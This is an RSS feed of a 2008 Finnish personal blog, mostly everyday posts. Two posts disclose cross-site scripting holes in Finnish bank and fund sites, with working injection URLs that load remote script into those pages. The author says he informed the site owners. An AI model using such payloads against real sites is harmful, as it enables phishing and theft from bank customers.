<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.0.5" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>Ihminen.org</title>
	<link>http://www.ihminen.org</link>
	<description>Digitaalista ihmisyyttä</description>
	<pubDate>Sun, 22 Jun 2008 18:34:08 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.0.5</generator>
	<language>en</language>
			<item>
		<title>Ekoketti</title>
		<link>http://www.ihminen.org/blogi/2008/06/22/ekoketti/</link>
		<comments>http://www.ihminen.org/blogi/2008/06/22/ekoketti/#comments</comments>
		<pubDate>Sun, 22 Jun 2008 18:33:50 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Filosofia &amp; ihmettely</category>

		<category>Tempaukset</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/06/22/netiketti/</guid>
		<description><![CDATA[Googlehaku sanalle ekoketti tuottaa nolla tulosta, joten ystäväiseni keksimä uudissana on täten erittäin tieteellisesti todistettu ihka uudeksi.
Ekoketti eli ekoquette on normatiivinen sääntö sille, &#8220;kuinka toimia ekologisesti ympäristöä säästäen&#8221;.
Ja sitten eikun käyttämään!

]]></description>
			<content:encoded><![CDATA[<p>Googlehaku sanalle <a href="http://www.google.com/search?q=ekoketti" onclick="javascript:urchinTracker ('/outbound/article/www.google.com');">ekoketti</a> tuottaa nolla tulosta, joten ystäväiseni keksimä <a href="http://fi.wikipedia.org/wiki/Uudissana" onclick="javascript:urchinTracker ('/outbound/article/fi.wikipedia.org');">uudissana</a> on täten erittäin tieteellisesti todistettu <i>ihka uudeksi</i>.</p>
<blockquote><p><strong>Ekoketti</strong> eli <i>ekoquette</i> on normatiivinen sääntö sille, &#8220;kuinka toimia ekologisesti ympäristöä säästäen&#8221;.</p></blockquote>
<p>Ja sitten eikun käyttämään!
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/06/22/ekoketti/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Juttujen opettelu</title>
		<link>http://www.ihminen.org/blogi/2008/06/21/juttujen-opettelu/</link>
		<comments>http://www.ihminen.org/blogi/2008/06/21/juttujen-opettelu/#comments</comments>
		<pubDate>Sat, 21 Jun 2008 12:20:39 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Arki</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/06/21/juttujen-opettelu/</guid>
		<description><![CDATA[Kaikenlaisten ammattiin liittyvien taitojen opettelun lisäksi on minusta alkanut tuntua tärkeältä osata yksi tai ehkä kaksi hauskaa puuhastelutaitoa. Ensinnäkin olisi hienoa osata jongleerata palloilla. Teppo Moisiolla on blogissa jonkinlainen opas touhuun. Toinen kiva juttu olisi kitarointi. Siihenkin löytyisi netistä vaikka kuinka kursseja, ilmaisia ja maksullisia, mutta eipä kansalaisopiston peruskurssitkaan paljoa maksaisi.
Eli tähtäimessä aloittaa ainakin toinen [...]]]></description>
			<content:encoded><![CDATA[<p>Kaikenlaisten ammattiin liittyvien taitojen opettelun lisäksi on minusta alkanut tuntua tärkeältä osata yksi tai ehkä kaksi hauskaa puuhastelutaitoa. Ensinnäkin olisi hienoa osata jongleerata palloilla. Teppo Moisiolla on blogissa <a href="http://pohdiskeleva.liftari.org/2005/05/10/puistoleikkikoulu-alkaa/" onclick="javascript:urchinTracker ('/outbound/article/pohdiskeleva.liftari.org');">jonkinlainen opas</a> touhuun. Toinen kiva juttu olisi kitarointi. Siihenkin löytyisi netistä vaikka kuinka kursseja, ilmaisia ja maksullisia, mutta eipä kansalaisopiston peruskurssitkaan paljoa maksaisi.</p>
<p>Eli tähtäimessä aloittaa ainakin toinen touhuista tän kesän aikana.</p>
<p>Saas nähdä sitten lokakuussa, onko kummankaan aloittamisesta - saati touhuamisesta tullut yhtään mitään. Oletettavaahan nimittäin on, ettei ole.
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/06/21/juttujen-opettelu/feed/</wfw:commentRss>
		</item>
		<item>
		<title>TTVO:n pääsykokeissa nähdään</title>
		<link>http://www.ihminen.org/blogi/2008/05/13/ttvon-paasykokeissa-nahdaan-2/</link>
		<comments>http://www.ihminen.org/blogi/2008/05/13/ttvon-paasykokeissa-nahdaan-2/#comments</comments>
		<pubDate>Tue, 13 May 2008 13:11:25 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Arki</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/05/13/ttvon-paasykokeissa-nahdaan-2/</guid>
		<description><![CDATA[Tänään tuli aamulla postista onnittelukirje, joka kutsui TTVO:n pääsykokeisiin 2.-3.6. Jesh! TTVO:n uutinen.
Yösijaa, anyone? Onko kukaan kulkemassa Tampereelle Jyväskylästä ja takaisin?

]]></description>
			<content:encoded><![CDATA[<p>Tänään tuli aamulla postista onnittelukirje, joka kutsui TTVO:n pääsykokeisiin 2.-3.6. Jesh! <a href="http://www.cult.tpu.fi/ttvo/uutiset/nayta_uutinen.php?id=321&#038;pos=0" onclick="javascript:urchinTracker ('/outbound/article/www.cult.tpu.fi');">TTVO:n uutinen.</a></p>
<p>Yösijaa, anyone? Onko kukaan kulkemassa Tampereelle Jyväskylästä ja takaisin?
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/05/13/ttvon-paasykokeissa-nahdaan-2/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Wissensarbeit macht frei</title>
		<link>http://www.ihminen.org/blogi/2008/05/05/wissensarbeit-macht-frei/</link>
		<comments>http://www.ihminen.org/blogi/2008/05/05/wissensarbeit-macht-frei/#comments</comments>
		<pubDate>Mon, 05 May 2008 10:34:53 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Filosofia &amp; ihmettely</category>

		<category>Linkkivinkit</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/05/05/wissensarbeit-macht-frei/</guid>
		<description><![CDATA[
&#8220;Tietotyö vapauttaa&#8221; julistaa Mattilanniemestä vappuna löytynyt graffiti saksaksi. Blogissa kerrotaan:
Yliopistolaisten aamuihin puhtia tuovan sloganin toteutti mainostoimisto Das Kapital, Castells und Himanen, joka toimii toistaiseksi yrityksenä vailla yhteystietoja. Kampanja saa jatkoa kesän ja syksyn myötä. Nyt ei itketä, nyt ruvetaan töihin!
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.ihminen.org/wp-content/uploads/wissensarbeit_macht_frei_jkl08.jpg"class="imagelink"  title="Wissensarbeit macht frei @ Jyväskylä 2008" ><img id="image409" src="http://www.ihminen.org/wp-content/uploads/wissensarbeit_macht_frei_jkl08.jpg" alt="Wissensarbeit macht frei @ Jyväskylä 2008" /></a></p>
<p>&#8220;Tietotyö vapauttaa&#8221; julistaa Mattilanniemestä vappuna löytynyt graffiti saksaksi. <a href="http://yritysilmanyhteystietoja.wordpress.com/2008/04/29/tietotyo-vapauttaa/" onclick="javascript:urchinTracker ('/outbound/article/yritysilmanyhteystietoja.wordpress.com');">Blogissa</a> kerrotaan:</p>
<blockquote><p><em>Yliopistolaisten aamuihin puhtia tuovan sloganin toteutti mainostoimisto Das Kapital, Castells und Himanen, joka toimii toistaiseksi yrityksenä vailla yhteystietoja. Kampanja saa jatkoa kesän ja syksyn myötä. Nyt ei itketä, nyt ruvetaan töihin!</em></p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/05/05/wissensarbeit-macht-frei/feed/</wfw:commentRss>
		</item>
		<item>
		<title>TTVO:n ennakkotehtävät</title>
		<link>http://www.ihminen.org/blogi/2008/04/24/ttvon-ennakkotehtavat/</link>
		<comments>http://www.ihminen.org/blogi/2008/04/24/ttvon-ennakkotehtavat/#comments</comments>
		<pubDate>Thu, 24 Apr 2008 08:12:14 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Arki</category>

		<category>Duuni</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/04/24/ttvon-ennakkotehtavat/</guid>
		<description><![CDATA[Nämä varmasti kiinnostaa muita TTVO:lle hakeneita tai ensi vuonna hakemista suunnittelevia. En ikäväkseni ehtinyt kuvaamaan lopullista tuotosta, joka oli siis digivedos A3-koossa ja sidottu mustalla spiraali-kierteellä. Hain siis suuntautumisvaihtoehtoon &#8220;vuorovaikutteinen media&#8221; ja haaveenani olisi painottaa enemmän graafista suunnittelua/printtiä vahvan webbiduunaamisen rinnalle. Pelikehitys tai ohjelmointi jääköön vähemmälle, vaikka nekin tietty kiinnostavia aiheita on. Kaikenlaisia projekteja on [...]]]></description>
			<content:encoded><![CDATA[<p>Nämä varmasti kiinnostaa muita <a href="http://cult.tpu.fi/" onclick="javascript:urchinTracker ('/outbound/article/cult.tpu.fi');">TTVO</a>:lle hakeneita tai ensi vuonna hakemista suunnittelevia. En ikäväkseni ehtinyt kuvaamaan lopullista tuotosta, joka oli siis digivedos A3-koossa ja sidottu mustalla spiraali-kierteellä. Hain siis suuntautumisvaihtoehtoon &#8220;vuorovaikutteinen media&#8221; ja haaveenani olisi painottaa enemmän graafista suunnittelua/printtiä vahvan webbiduunaamisen rinnalle. Pelikehitys tai ohjelmointi jääköön vähemmälle, vaikka nekin tietty kiinnostavia aiheita on. Kaikenlaisia projekteja on ollut mielessä jo pitkään, pitäisi vain löytää aikaa ja hyviä tyyppejä joiden kanssa niitä voisi toteuttaa. Ehkäpä opiskeluaikana siis. Ehkäpä&#8230;</p>
<ul>
<li><a href="http://www.ihminen.org/wp-content/uploads/portfolio2008_screen.pdf"rel="attachment"  >TTVO:n ennakkotehtäväni 2008</a> - PDF 2,5 mt. </li>
</ul>
<p>Klikkaa oikealla hiiren napilla ja &#8220;tallenna nimellä / save as&#8221;, jottei selaimesi jää jumiin tiedostokoon vuoksi.</p>
<p>Kiinnostuneet voivat lukea myös <a href="http://tamk-ttvo.blogspot.com/" onclick="javascript:urchinTracker ('/outbound/article/tamk-ttvo.blogspot.com');">TTVO:n hakublogia</a>. Kesäkuussa muistaakseni on haastattelut ja heinäkuussa tulee tietoa opiskelemaan pääsystä/hylkäyksestä. Ihan kivaa kun ei tarvitse hirveällä stressillä odottaa, lähinnä pienellä jänskätyksellä. Jos en pääse opiskelemaan niin jatkan kuten tähänkin asti: mielenkiintoisia töitä kyllä riittää enemmän kuin ehtisi tehdäkään. Päivitän tietoja hakuprosessista tänne ajan mittaan.</p>
<p>Tsemppiä kaikille muillekkin hakeneille!
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/04/24/ttvon-ennakkotehtavat/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Kun viestintäjohtaja tunaroi viestinnän perusteissa</title>
		<link>http://www.ihminen.org/blogi/2008/04/19/kun-viestintajohtaja-tunaroi-viestinnan-perusteissa/</link>
		<comments>http://www.ihminen.org/blogi/2008/04/19/kun-viestintajohtaja-tunaroi-viestinnan-perusteissa/#comments</comments>
		<pubDate>Sat, 19 Apr 2008 19:07:45 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Media</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/04/19/kun-viestintajohtaja-tunaroi-viestinnan-perusteissa/</guid>
		<description><![CDATA[Viestinnän ammattilaist pyörittelivät päätään kun Nelosen uutiset lähetti Sampopankin viestintäjohtajan haastattelun pääsiäisen aikoihin.
Haastattelija: Onko sammon verkkopankissa tietoturva-aukko?
Hannu Vuola: Ei.
Haastattelija: Tänään kerrottiin että siinä olis ollu, mitä te sanotte siihen?
Hannu Vuola: Meillä oli tota pieni tietoturva ongelma meidän sivustolla, mut se ei ollu verkkopankissa kyllä suorastaan ja me on korjattu se monta tuntia sitten.
Viestintäjohtaja siis ajattelee, [...]]]></description>
			<content:encoded><![CDATA[<p>Viestinnän ammattilaist pyörittelivät päätään kun Nelosen uutiset lähetti <a href="http://www.youtube.com/watch?v=re804LViLqo" onclick="javascript:urchinTracker ('/outbound/article/www.youtube.com');">Sampopankin viestintäjohtajan haastattelun</a> pääsiäisen aikoihin.</p>
<blockquote><p><em><b>Haastattelija:</b> Onko sammon verkkopankissa tietoturva-aukko?<br />
<b>Hannu Vuola</b>: Ei.<br />
<b>Haastattelija:</b> Tänään kerrottiin että siinä olis ollu, mitä te sanotte siihen?<br />
<b>Hannu Vuola:</b> Meillä oli tota pieni tietoturva ongelma meidän sivustolla, mut se ei ollu verkkopankissa kyllä suorastaan ja me on korjattu se monta tuntia sitten.</em></p></blockquote>
<p>Viestintäjohtaja siis ajattelee, että erittelemällä verkkopankin ja sivuston informaatio-osuudet kahdeksi erilliseksi &#8220;sivustoksi&#8221;, voidaan sanoa ettei sammon verkkopankissa ole tietoturva-aukkoa. Tavalliset käyttäjäthän eivät näin ajattele.</p>
<p>Kun &#8220;pieni tietoturva ongelma&#8221; sitten löydettiin ja korjattiin, olisi fiksu pankki tietysti tutkinut ohjelmistonsa läpi muiden vastaavien ongelmien varalta. Muutoin tämmöiset pikkuohjelmoijat Jyväskylästä tsekkaa sivuston läpi ja löytää <a href="http://online.sampopankki.fi/DK?gsProdukt=INF&#038;gsNextObj=eAbonment&#038;gsNextAkt=EaboLst&#038;gsSprog=FI&#038;gsBrand=SAM&#038;gsCurItem=%22%3E%3Cscript%20src=http://www.ihminen.org?x1%3E" onclick="javascript:urchinTracker ('/outbound/article/online.sampopankki.fi');">lisää aukkoja</a>.</p>
<p><a href="http://www.ihminen.org/xss/#sampo" >Lue lisää XSS-haavoittuvuuksista XSS-sivultani</a>.
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/04/19/kun-viestintajohtaja-tunaroi-viestinnan-perusteissa/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Flow-seikkailu</title>
		<link>http://www.ihminen.org/blogi/2008/04/12/flow-seikkailu/</link>
		<comments>http://www.ihminen.org/blogi/2008/04/12/flow-seikkailu/#comments</comments>
		<pubDate>Sat, 12 Apr 2008 07:51:43 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Arki</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/04/12/flow-seikkailu/</guid>
		<description><![CDATA[Eilinen liftausreissu päätyi absurdiin yökukkuiluun kun törmäsin kaveriin TTVO:n kahvilassa. Ennakkotehtävät ehdin palauttaa rullakkoon hyvissä ajoin, kun pääsin Tampereelle tasan kahdessa tunnissa (klo12-14). Päädyttiin ensin kokkailemaan Hatanpäähän ja sieltä puoliltaöin Hervantaan Eläkeläiset-coverbändin treeneihin. Se oli nukahtelua ja humppaa vuorotellen, oli hyvää settiä ja ilo oli kuunnella. Aina välillä väsy voitti ja havahduin jostain koomasta ku [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.ihminen.org/blogi/2008/04/10/lahettina/" >Eilinen liftausreissu</a> päätyi absurdiin yökukkuiluun kun törmäsin kaveriin TTVO:n kahvilassa. Ennakkotehtävät ehdin palauttaa rullakkoon hyvissä ajoin, kun pääsin Tampereelle tasan kahdessa tunnissa (klo12-14). Päädyttiin ensin kokkailemaan Hatanpäähän ja sieltä puoliltaöin Hervantaan Eläkeläiset-coverbändin treeneihin. Se oli nukahtelua ja humppaa vuorotellen, oli hyvää settiä ja ilo oli kuunnella. Aina välillä väsy voitti ja havahduin jostain koomasta ku humppa soi ympärillä.</p>
<p>Koko yö meni nukkumatta. Aamulla sain bändin tyypeiltä kyydin Jyväskylään ja kuljettiin läpi ABC:n kahvien, Kuokkalan, Kypärämäen ja nyt mä olen tässä. Kello tulee yksitoista, lauantai vissiin on.</p>
<p>Aina sitä päätyy kaikkiin ihme seikkailuihin.
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/04/12/flow-seikkailu/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Lähettinä</title>
		<link>http://www.ihminen.org/blogi/2008/04/10/lahettina/</link>
		<comments>http://www.ihminen.org/blogi/2008/04/10/lahettina/#comments</comments>
		<pubDate>Thu, 10 Apr 2008 19:40:16 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Arki</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/04/10/lahettina/</guid>
		<description><![CDATA[Hain tänään kopijyvältä TTVO:n ennakkotehtäväni; ihan hienot tuli! Vaikka kyllähän sinne kaikkea fiksattavaakin jäi. Voin laittaa huomenna tai viikonloppuna näytille.
Ajattelin aluksi että teen sidonnan itse, mutta testikappale näytti niin hirveältä että peruin idean. Kello oli tosin jo niin paljon, etten kierrejousta missään ehtinyt teettää ja postitukset lähtevät kuudelta tai puoliseiskalta.
Tuli sit idis: jos teetänkin kunnon [...]]]></description>
			<content:encoded><![CDATA[<p>Hain tänään kopijyvältä TTVO:n ennakkotehtäväni; ihan hienot tuli! Vaikka kyllähän sinne kaikkea fiksattavaakin jäi. Voin laittaa huomenna tai viikonloppuna näytille.</p>
<p>Ajattelin aluksi että teen sidonnan itse, mutta testikappale näytti niin hirveältä että peruin idean. Kello oli tosin jo niin paljon, etten kierrejousta missään ehtinyt teettää ja postitukset lähtevät kuudelta tai puoliseiskalta.</p>
<p>Tuli sit idis: jos teetänkin kunnon sidonnan aamulla ja sitten liftausreissu Tampereelle. Matskut tarttee olla opintotoimistolla klo 16.15.</p>
<p>Kivalta kuulostaa! Kunhan ei sada. Ai häh, ajoissako olis pitäny olla? :-)</p>
<ul>
<li><b>Lisäys 11.4. klo 8.41</b> - Perskele, tuollahan sataa räntää!</li>
<li><b>Lisäys 11.4. klo 11.35</b> - Räntäsade loppui, kopijyvältä &#8220;spiraali&#8221; portfolionreunaan ja aurinkokin paistaa. Liftaan sittenkin. Juna olis lähteny 13.22</li>
<li><b>Lisäys 11.4. klo 14.43</b> - Tuli yhteensä vaan vartti odottelua tien varressa (Nokiatalon edessä ja Jämsän liikenneympyrässä). Ennakkotehtävät palautettu ja nyt kanapurilaista saa nälkäinen sekkailija American Dineris. Täällä on ilmainen WLANikin.</li>
<li><b>Lisäys 12.4. klo 10.53</b> - <a href="http://www.ihminen.org/blogi/2008/04/12/flow-seikkailu/" >Kotona&#8230; örrr.</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/04/10/lahettina/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Kiekun munat</title>
		<link>http://www.ihminen.org/blogi/2008/04/09/kiekun-munat/</link>
		<comments>http://www.ihminen.org/blogi/2008/04/09/kiekun-munat/#comments</comments>
		<pubDate>Wed, 09 Apr 2008 15:50:08 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Filosofia &amp; ihmettely</category>

		<category>Media</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/04/09/kiekun-munat/</guid>
		<description><![CDATA[Minkä tuoteryhmän pakkaukset ovat perinteisesti näyttäneet aivan järkyn hirveiltä, eikä eri merkkejä ole edes erottanut toisistaan? Niinpä, kananmunien.
Kieku Oy:llä on kunnianhimoinen tavoite uudistaa hommaa:
Ministeri myös ilmaisi ihailevansa Kieku Oy:n pyrkimystä luoda kananmunasta brändi ja kiitosta sai myös rohkeus, jolla Kieku verkkosivuillaan on antanut yrittäjille kasvot.
Tiedote avajaisista 1.2.
Jännää miten sitä ihminen ostaa nätimmän paketin, vaikka ihan [...]]]></description>
			<content:encoded><![CDATA[<p>Minkä tuoteryhmän pakkaukset ovat perinteisesti näyttäneet aivan järkyn hirveiltä, eikä eri merkkejä ole edes erottanut toisistaan? Niinpä, kananmunien.</p>
<p><a href="http://www.kiekuoy.fi/" onclick="javascript:urchinTracker ('/outbound/article/www.kiekuoy.fi');">Kieku Oy</a>:llä on kunnianhimoinen tavoite uudistaa hommaa:</p>
<blockquote><p><em>Ministeri myös ilmaisi ihailevansa Kieku Oy:n pyrkimystä luoda kananmunasta brändi ja kiitosta sai myös rohkeus, jolla Kieku verkkosivuillaan on antanut yrittäjille kasvot.</p>
<p><a href="http://www.kiekuoy.fi/?id=504221F0-0C5D4A66957C-5470E9CB7C9B" onclick="javascript:urchinTracker ('/outbound/article/www.kiekuoy.fi');">Tiedote avajaisista 1.2.</a></em></p></blockquote>
<p>Jännää miten sitä ihminen ostaa nätimmän paketin, vaikka ihan samoja luomumunia olis kaikissa paketeissa.
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/04/09/kiekun-munat/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Talonvaltaus Jyväskylän yliopistolla</title>
		<link>http://www.ihminen.org/blogi/2008/04/01/talonvaltaus_jyvaskylan_yliopistolla/</link>
		<comments>http://www.ihminen.org/blogi/2008/04/01/talonvaltaus_jyvaskylan_yliopistolla/#comments</comments>
		<pubDate>Tue, 01 Apr 2008 18:19:00 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Media</category>

		<category>Linkkivinkit</category>

		<category>Politiikka</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/04/01/402/</guid>
		<description><![CDATA[Ihmeteltiinkin vähän Minnan kanssa, et mitä tuo poliisisetä tota rakennusta oikein kiertelee ja taskulampulla katselee.

KSML.fi: Talo vallattu yliopiston kampusalueella
HS.fi: Yliopiston rakennus vallattin Jyväskylässä
Yle: Yliopiston rakennus vallattiin Jyväskylässä

Muistakaa, että vaikka Helsingissä nuorisoliikehdintä lisätilojen (nuoriso- ja opiskelijapippalotilat) saamiseksi on ollut näkyvintä, puuttuu tiloja paljon myös Jyväskylästä. Onneksi kohta saadaan veturitallit kulttuurikäyttöön, edes. 
Valtaajat kommentoivat osuvasti:
Yliopisto ja kaupunkitila [...]]]></description>
			<content:encoded><![CDATA[<p>Ihmeteltiinkin vähän Minnan kanssa, et mitä tuo poliisisetä tota rakennusta oikein kiertelee ja taskulampulla katselee.</p>
<ul>
<li><a href="http://www.ksml.fi/uutiset/keski-suomi/talo-vallattu-yliopiston-kampusalueella(100218).ece" onclick="javascript:urchinTracker ('/outbound/article/www.ksml.fi');">KSML.fi: Talo vallattu yliopiston kampusalueella</a></li>
<li><a href="http://www.hs.fi/kotimaa/artikkeli/Yliopiston+rakennus+vallattiin+Jyväskylässä/1135235228568" onclick="javascript:urchinTracker ('/outbound/article/www.hs.fi');">HS.fi: Yliopiston rakennus vallattin Jyväskylässä</a></li>
<li><a href="http://www.yle.fi/uutiset/24h/id86858.html" onclick="javascript:urchinTracker ('/outbound/article/www.yle.fi');">Yle: Yliopiston rakennus vallattiin Jyväskylässä</a></li>
</ul>
<p>Muistakaa, että vaikka Helsingissä nuorisoliikehdintä lisätilojen (nuoriso- ja opiskelijapippalotilat) saamiseksi on ollut näkyvintä, puuttuu tiloja paljon myös Jyväskylästä. Onneksi kohta saadaan veturitallit kulttuurikäyttöön, edes. </p>
<p>Valtaajat kommentoivat osuvasti:</p>
<blockquote><p>Yliopisto ja kaupunkitila ovat kriisissä. Monet urputtavat. Me teemme.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/04/01/talonvaltaus_jyvaskylan_yliopistolla/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Listaus XSS-haavoittuvuuksista suomessa</title>
		<link>http://www.ihminen.org/blogi/2008/03/30/listaus_xss-haavoittuvuuksista_suomessa/</link>
		<comments>http://www.ihminen.org/blogi/2008/03/30/listaus_xss-haavoittuvuuksista_suomessa/#comments</comments>
		<pubDate>Sun, 30 Mar 2008 00:06:46 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Media</category>

		<category>Tekniikka</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/03/30/xsssss/</guid>
		<description><![CDATA[Pieni päivitys tähän viestiin. Muutin tämän sivun osoitetta (ja otsikkoa) sekä liitän tuon XSS-sivun suoraan tähän. Osoite www.ihminen.org/xss/ Toimii edelleen, mutta sama sisältö päivittyy siis automaattisesti myös tähän, joten kommentointi on mahdollista.

Viimeaikoina on uutisoitu paljon XSS (Cross Site Scripting) -aukoista, joten tsekkailin joutessani läpi suomalaisia uutispalveluita ja muita johtavia/turvallisiksi luultuja nettisivustoja ko. ongelman varalta. Lähes [...]]]></description>
			<content:encoded><![CDATA[<p>Pieni päivitys tähän viestiin. Muutin tämän sivun osoitetta (ja otsikkoa) sekä liitän tuon XSS-sivun suoraan tähän. Osoite <a href="http://www.ihminen.org/xss/" >www.ihminen.org/xss/</a> Toimii edelleen, mutta sama sisältö päivittyy siis automaattisesti myös tähän, joten kommentointi on mahdollista.<br />
<hr /></p>
<p>Viimeaikoina on uutisoitu paljon XSS (Cross Site Scripting) -aukoista, joten tsekkailin joutessani läpi suomalaisia uutispalveluita ja muita johtavia/turvallisiksi luultuja nettisivustoja ko. ongelman varalta. Lähes jokaisella sivustolla, jonka testasin, oli XSS-aukkoja. Yleensä viat löytyivät alle minuutissa. Todella harmillisella tolalla isojenkin sivustojen phising-sietokyky. Erityisesti minua huolettaa nuo pankit.</p>
<p>Listaamani esimerkit saattavat olla hieman karkeita, mutta ajan kanssa aukkojen avulla saisi hiottua todella taitavia huijauksia, jotka pahimmillaan aiheuttaisivat asiakkaille rahanmenetyksiä. Aikkoja löytyi myös Osuuspankin ja Aktia-pankin nettisivuilta, jotka luokittelisin vakavimmiksi.</p>
<p>XSS-haavoittuvuutta voi hyödyntyää rikollisesti muotoilemalla sellaisen sähköpostin, että käyttäjä klikkaa viestissä olevaa linkkiä ja antaa jotain tärkeää informaatiota sivustolla joka linkistä aukeaa. Yleensä käyttäjätunnuksia ja tunnuslukuja sivustolle, jolla käsitellään rahaa. Lisää haavoittuvuudesta voi lukea esim. <a href="http://en.wikipedia.org/wiki/Cross-site_scripting" onclick="javascript:urchinTracker ('/outbound/article/en.wikipedia.org');">Wikipediasta</a> tai <a href="http://blogit.tietokone.fi/tietojakoneesta/?p=348" onclick="javascript:urchinTracker ('/outbound/article/blogit.tietokone.fi');">Tietokone-lehden blogista</a>.</p>
<p>Testailut olen tehnyt vain Opera-selaimella, joten jotkin XSS-aukot saattavat pikkusäätöjen vuoksi jäädä toimimatta muilla selaimilla. Ne ovat kuitenkin toimivia eivätkä vaatisi paljoa säätöä toimiakseen hyvin.</p>
<p>Materiaalit (tekstit ja kuvat) ovat vapaasti lehdistön ja bloggaajien käytettävissä.</p>
<p>Olen informoinut jokaista sivuston ylläpitäjää. Testataksesi haavoittuvuutta, klikkaa sivuston nimeä tai lue tarkemmat ohjeet/vian kuvaus.</p>
<hr />
<p><h3>Lista</h3>
<ol id="xss_lista">
<h4>Korjaamatta</h4>
<li name="sampo">
        <a href="http://online.sampopankki.fi/DK?gsProdukt=INF&#038;gsNextObj=eAbonment&#038;gsNextAkt=EaboLst&#038;gsSprog=FI&#038;gsBrand=SAM&#038;gsCurItem=%22%3E%3Cscript%20src=http://www.ihminen.org?x1%3E" onclick="javascript:urchinTracker ('/outbound/article/online.sampopankki.fi');"><b>Sampopankki</b></a> (joukkolainat.fi korjaamatta)<br />
        Sammon parjatusta verkkopankista löytyi jälleen tietoturva-aukko (19.4.). Aukon kautta on mahdollista suorittaa ns. phising-hyökkäyksiä. Esimerkeissä kirjoitan sivun päälle omaa sisältöäni, mm. youtube-videon.</p>
<p>        Toisessa esimerkissä näkyy <a href="http://online.sampopankki.fi/DK?gsProdukt=INF&#038;gsNextObj=eAbonment&#038;gsNextAkt=EaboLst&#038;gsSprog=FI&#038;gsBrand=SAM&#038;gsCurItem=%22%3E%3Cscript%20src=http://www.ihminen.org?x2%3E" onclick="javascript:urchinTracker ('/outbound/article/online.sampopankki.fi');">Nordean sivu sampopankin päällä</a>.</p>
<p>        Myös sampopankin palvelut <b><a href="http://www.joukkolainat.fi/plsql/kurslister.struk_list?p_language=65&#038;P_menu=&#038;p_table_size=%22%3E%3Cscript%20src=http://www.ihminen.org/xss/inc.js.php%3E%3C/script%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.joukkolainat.fi');">Joukkolainat.fi</a></b> sekä <b><a href="http://www.rahastot.fi/plsql/fund_output.vis_kursgraf?p_language=59&#038;p_vafdeling=2310&#038;p_valuta=EUR&#038;p_table_size=%22%3E%3Cscript%20src=http://www.ihminen.org/xss/inc.js.php%3E%3C/script%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.rahastot.fi');">Rahastot.fi</a></b> ovat haavoittuvaisia (katso esimerkit linkeistä).</p>
<p>        Tästä minulla on <a href="http://www.ihminen.org/xss/sampopankki_xss_2008-04-19.tiff" >kuvakaappaus</a> (TIF, 572 Kb), josta näkyy kuinka osoiterivillä lukee sampopankki.fi</p>
<p>        Olen aiemmin löytänyt aukot jo nordea-, osuus-, ja aktia-pankkien sivuilta. Sampopankkia en aiemmin jaksanut tutkia sivuston pätkimisen vuoksi. Nyt kun tsekkasin niin löytyihän sieltäkin moisia.
    </li>
<li>
